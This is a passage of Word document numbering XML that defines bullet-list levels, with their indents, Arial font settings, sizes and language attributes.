    <w:lvl w:ilvl="1" w:tplc="29FAC678">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="870" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="9836B44E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1237" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="82E86C92">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1700" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9E4C3E24">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4200" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6E8C4902">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6700" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4FF607E0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9200" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="714AC460">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11700" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="1B26DD44">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="14200" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6B8E6E65"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E918D32E"/>
    <w:lvl w:ilvl="0" w:tplc="44A870F4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1824" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="56"/>
        <w:szCs w:val="56"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="CCDEE5EE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3558" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="94AE8630">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5296" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="89BA1FB0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7034" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E7122860">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8772" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="563839E4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10510" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="2A14BFDC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="12248" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D54EB600">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="13986" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="9B2ED19E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15724" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6BA72F85"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6DBAD6A6"/>
    <w:lvl w:ilvl="0" w:tplc="23FCC618">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1180" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="48"/>
        <w:szCs w:val="48"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="3AD0BA58">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1612" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="6CC89D36">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2333" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="48"/>
        <w:szCs w:val="48"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="B372C95A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2340" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="15DCFF82">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4748" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C0C286E6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7157" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="BFFA6EE0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9565" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="118EBBE6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11974" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E4B0E6AC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="14382" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6BB43988"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="93780AC2"/>
    <w:lvl w:ilvl="0" w:tplc="36388584">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1180" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="64"/>
        <w:szCs w:val="64"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="78AA9CDA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1901" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="48"/>
        <w:szCs w:val="48"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04302534">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3822" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="BF64FBFA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5744" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="724C5574">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7666" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="AE42B632">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9588" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="38CAFF56">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11511" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="43BABDA6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="13433" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="172A11D8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15355" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="31" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6C4B46C6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ABF4379A"/>
    <w:lvl w:ilvl="0" w:tplc="94BED06A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1070" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="48"/>
        <w:szCs w:val="48"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="FFC01EC6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1790" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D9EE3336">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3733" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="FD74D8A4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5666" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="CC5094FC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7600" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="1DF820E2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9533" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E90AE340">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11466" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B83A0926">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="13400" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="523AC9FE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15333" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="32" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6CD44FCA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5BB6D97E"/>
    <w:lvl w:ilvl="0" w:tplc="4A724B1E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1288" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="16A0444C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1716" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="6ADE4B02">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2437" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="135E452A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="AEE03818">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4834" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4FF6036C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7228" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="7E46E160">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9622" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="E446ECF0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="12017" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="3A16D752">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="14411" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="77067B61"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="026EB756"/>
    <w:lvl w:ilvl="0" w:tplc="FF30905C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1066" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="56"/>
        <w:szCs w:val="56"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A0DCB46E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1786" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="609E20A2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2507" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="70EA1E26">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4587" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="17C89F08">
      <w:numFmt w:val="bullet"/>
